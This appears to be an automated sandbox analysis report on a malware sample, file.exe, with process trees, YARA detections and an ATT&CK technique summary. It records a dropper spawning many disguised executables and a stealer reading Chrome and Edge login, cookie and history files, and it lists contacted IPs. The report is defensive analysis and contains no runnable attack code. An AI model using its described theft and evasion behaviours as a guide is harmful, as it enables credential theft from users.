                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe "C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe" --silent --allusers=0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe "C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe "C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe "C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe "C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe "C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe "C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe" --silent --allusers=0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe "C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe "C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe "C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe "C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe "C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe" --silent --allusers=0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe "C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe "C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe "C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe "C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe" --silent --allusers=0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe "C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe "C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe "C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: unknown unknown (34 such entries in the report: child processes whose image path and command line are reported as unknown)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: unknown unknown (9 such entries in the report)
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 1892 -ip 1892
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1892 -s 55932
                    Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown (11 such entries in the report)
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe Process created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c1121c8,0x6c1121d4,0x6c1121e0
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe Process created: unknown unknown
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe Process created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe Process created: unknown unknown
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe Process created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe c:\users\user\pictures\7odvnhyi6ubwlrbalo6wunsw.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c1121c8,0x6c1121d4,0x6c1121e0
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Code function: 15_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,15_2_0042E09C
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp Binary or memory string: k..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
                    Source: BroomSetup.exe, 0000001B.00000002.3339978515.000000000041C000.00000040.00000001.01000000.00000019.sdmp Binary or memory string: Shell_TrayWndSVW
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp Binary or memory string: ..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp Binary or memory string: f..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
                    Source: BroomSetup.exe, 0000001B.00000002.3339978515.000000000041C000.00000040.00000001.01000000.00000019.sdmp Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SVW
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe Code function: 17_2_009BFE51 cpuid 17_2_009BFE51
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe Code function: GetLocaleInfoA,14_2_0040520C
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe Code function: GetLocaleInfoA,14_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Code function: GetLocaleInfoA,15_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Code function: GetLocaleInfoA,15_2_004085B4
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                    Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp Queries volume information: C:\Users\user\AppData\Local\Simple Web Builder Free\libgcc_s_dw2-1.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp Queries volume information: C:\Users\user\AppData\Local\Simple Web Builder Free\libvorbis-0.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp Queries volume information: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Code function: 15_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,15_2_004585C8
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe Code function: 14_2_004026C4 GetSystemTime,14_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Code function: 15_2_0045559C GetUserNameA,15_2_0045559C
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe Code function: 14_2_00405CF4 GetVersionExA,14_2_00405CF4
                    Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara match File source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.2d20e67.9.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, type: MEMORY
                    Source: Yara match File source: 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: N82pZRBoHBOB1dfNMGUFcUyF.exe PID: 45596, type: MEMORYSTR
                    Source: Yara match File source: 22.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.3.syncUpd.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.2.syncUpd.exe.8c0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.2.syncUpd.exe.8c0e67.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.3.syncUpd.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000016.00000002.3346089209.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                    Source: Yara match File source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000025.00000002.3136797413.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000025.00000002.3136899617.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000011.00000002.3389219004.0000000000908000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: simplewebbuilder.exe PID: 6628, type: MEMORYSTR
                    Source: Yara match File source: 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: syncUpd.exe PID: 45728, type: MEMORYSTR
                    Source: Yara match File source: 22.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.3.syncUpd.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.2.syncUpd.exe.8c0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.2.syncUpd.exe.8c0e67.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.3.syncUpd.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000016.00000002.3346089209.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                    Source: Yara match File source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: Yara match File source: Process Memory Space: syncUpd.exe PID: 45728, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara match File source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.2d20e67.9.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, type: MEMORY
                    Source: Yara match File source: 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: N82pZRBoHBOB1dfNMGUFcUyF.exe PID: 45596, type: MEMORYSTR
                    Source: Yara match File source: 22.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.3.syncUpd.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.2.syncUpd.exe.8c0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.2.syncUpd.exe.8c0e67.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.3.syncUpd.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000016.00000002.3346089209.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                    Source: Yara match File source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000025.00000002.3136797413.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000025.00000002.3136899617.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000011.00000002.3389219004.0000000000908000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: simplewebbuilder.exe PID: 6628, type: MEMORYSTR
                    Source: Yara match File source: 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: syncUpd.exe PID: 45728, type: MEMORYSTR
                    Source: Yara match File source: 22.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.3.syncUpd.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.2.syncUpd.exe.8c0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.2.syncUpd.exe.8c0e67.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 22.3.syncUpd.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000016.00000002.3346089209.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                    Source: Yara match File source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E1307A sqlite3_transfer_bindings,22_2_61E1307A
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E2D5E6 sqlite3_bind_int64,22_2_61E2D5E6
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E2D595 sqlite3_bind_double,22_2_61E2D595
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E0B431 sqlite3_clear_bindings,22_2_61E0B431
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E037F3 sqlite3_value_frombind,22_2_61E037F3
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E2D781 sqlite3_bind_zeroblob64,22_2_61E2D781
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E2D714 sqlite3_bind_zeroblob,22_2_61E2D714
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E2D68C sqlite3_bind_pointer,22_2_61E2D68C
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E2D65B sqlite3_bind_null,22_2_61E2D65B
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E2D635 sqlite3_bind_int,22_2_61E2D635
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E2D9B0 sqlite3_bind_value,22_2_61E2D9B0
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E2D981 sqlite3_bind_text16,22_2_61E2D981
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E2D945 sqlite3_bind_text64,22_2_61E2D945
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E2D916 sqlite3_bind_text,22_2_61E2D916
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E2D8E7 sqlite3_bind_blob64,22_2_61E2D8E7
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E038CA sqlite3_bind_parameter_count,22_2_61E038CA
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E158CA sqlite3_bind_parameter_index,22_2_61E158CA
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E038DC sqlite3_bind_parameter_name,22_2_61E038DC
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 22_2_61E2D8B8 sqlite3_bind_blob,22_2_61E2D8B8
                    MITRE ATT&CK Matrix

                    Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.

                    Techniques carrying a signature count for this sample, with the count shown beside each: Scripting (11), Native API (13), Exploitation for Privilege Escalation (1), Disable or Modify Tools (1), OS Credential Dumping (1), System Time Discovery (1), Archive Collected Data (1), Ingress Tool Transfer (1), System Shutdown/Reboot (1), Shared Modules (1), DLL Side-Loading (1), Deobfuscate/Decode Files or Information (1), Account Discovery (1), Data from Local System (1), Encrypted Channel (2), Command and Scripting Interpreter (12), Windows Service (4), Access Token Manipulation (1), Obfuscated Files or Information (21), File and Directory Discovery (3), Clipboard Data (1), Application Layer Protocol (1), Service Execution (2), Registry Run Keys / Startup Folder (2), Software Packing (21), System Information Discovery (58), Proxy (1), Bootkit (1), Process Injection (513), Timestomp (1), Query Registry (1), Security Software Discovery (551), Masquerading (21), Process Discovery (2), Virtualization/Sandbox Evasion (251), Application Window Discovery (11), System Owner/User Discovery (3), Remote System Discovery (1), System Network Configuration Discovery (1).

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph ID: 1407288; Sample: file.exe; Startdate: 12/03/2024; Architecture: WINDOWS; Score: 100

Sample-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 21 other signatures
Processes started from the sample: file.exe (14 / 2); svchost.exe; cmd.exe; 3 other processes

file.exe
  Network: 14.161.17.4 VNPT-AS-VNVNPTCorpVN Viet Nam; 14.232.235.13 VNPT-AS-VNVNPTCorpVN Viet Nam; 97 other IPs or domains
  Dropped: C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506, Microsoft
  Signatures: Writes to foreign memory regions; Sample uses process hollowing technique; Writes many files with high entropy; Injects a PE file into a foreign processes
  Started: InstallUtil.exe (15 / 291); CasPol.exe; InstallUtil.exe; WerFault.exe

svchost.exe
  Started: WerFault.exe

cmd.exe
  Started: conhost.exe

3 other processes
  Started: conhost.exe; conhost.exe

InstallUtil.exe
  Network: 194.87.206.12 AS-REGRU Russian Federation
  Dropped: C:\Users\...\xzRRQmj1LpBxF1iTy72H1YWe.exe, PE32; C:\Users\...\vuP05YoHCo3Zp0Gv9gzt1k3R.exe, PE32; C:\Users\...\uYudt0flCl0e0fQZ8vnWLOhm.exe, PE32; 221 other malicious files
  Signatures: Drops script or batch files to the startup folder; Creates HTML files with .exe extension (expired dropper behavior); Writes many files with high entropy
